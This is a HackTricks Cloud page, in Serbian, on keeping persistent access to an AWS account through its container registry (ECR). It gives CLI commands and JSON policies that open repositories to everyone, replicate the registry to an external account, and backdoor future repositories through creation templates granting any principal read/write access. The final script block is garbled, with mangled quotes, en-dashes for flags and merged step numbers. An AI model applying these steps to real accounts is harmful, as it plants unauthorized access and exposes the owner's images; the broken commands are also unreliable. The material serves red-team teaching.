HackTricks CloudAWS - ECR Persistence
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
ECR
Za više informacija pogledajte:
Skrivena Docker slika sa zlonamernim kodom
Napadač može uploadovati Docker image koji sadrži zlonamerni kod u ECR repository i koristiti ga za održavanje persistence u ciljanom AWS nalogu. Napadač potom može deploy-ovati zlonamerni image na različite servise unutar naloga, kao što su Amazon ECS ili EKS, na prikriven način.
Politika repozitorijuma
Dodajte politiku na pojedinačni repozitorijum koja vama (ili svima) dodeljuje pristup repozitorijumu:
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
Warning
Imajte na umu da ECR zahteva da korisnici imaju dozvolu da pozivaju
ecr:GetAuthorizationTokenAPI kroz IAM policy pre nego što se mogu autentifikovati na registry i push-ovati ili pull-ovati bilo koje slike iz bilo kog Amazon ECR repozitorijuma.
Politika registra i replikacija između naloga
Moguće je automatski replicirati registar u eksternom nalogu podešavanjem cross-account replication, gde treba da naznačite eksterni nalog u koji želite da replicirate registar.
.png)
Prvo, potrebno je dati eksternom nalogu pristup registru pomoću registry policy kao:
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
Zatim primenite konfiguraciju replikacije:
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
Repository Creation Templates (prefiks backdoor za buduće repos)
Iskoristite ECR Repository Creation Templates da automatski ubacite backdoor u bilo koji repository koji ECR automatski kreira pod kontrolisanim prefiksom (na primer preko Pull-Through Cache ili Create-on-Push). Ovo omogućava trajni neovlašćeni pristup budućim repos bez diranja postojećih.
- Potrebne dozvole: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (if a custom role is attached to the template).
- Uticaj: Bilo koji novi repository kreiran pod ciljnim prefiksom automatski nasleđuje repository policy pod kontrolom napadača (npr. cross-account read/write), podešavanja mutabilnosti tagova i podrazumevana podešavanja skeniranja.
Backdoor buduće PTC-created repos pod odabranim prefiksom
```bash # Region REGION=us-east-11) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<‘JSON’ { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “BackdoorRW”, “Effect”: “Allow”, “Principal”: {“AWS”: “*”}, “Action”: [ “ecr:BatchCheckLayerAvailability”, “ecr:BatchGetImage”, “ecr:GetDownloadUrlForLayer”, “ecr:InitiateLayerUpload”, “ecr:UploadLayerPart”, “ecr:CompleteLayerUpload”, “ecr:PutImage” ] } ] } JSON
2) Create a Repository Creation Template for prefix “ptc2” applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template –region $REGION –prefix ptc2 –applied-for PULL_THROUGH_CACHE –image-tag-mutability MUTABLE –repository-policy file:///tmp/repo_backdoor_policy.json
3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
This example caches from Amazon ECR Public namespace “nginx”
aws ecr create-pull-through-cache-rule –region $REGION –ecr-repository-prefix ptc2 –upstream-registry ecr-public –upstream-registry-url public.ecr.aws –upstream-repository-prefix nginx
4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity –query Account –output text) aws ecr get-login-password –region $REGION | docker login –username AWS –password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest
5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy –region $REGION –repository-name ptc2/nginx –query policyText –output text | jq .
</details>
> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>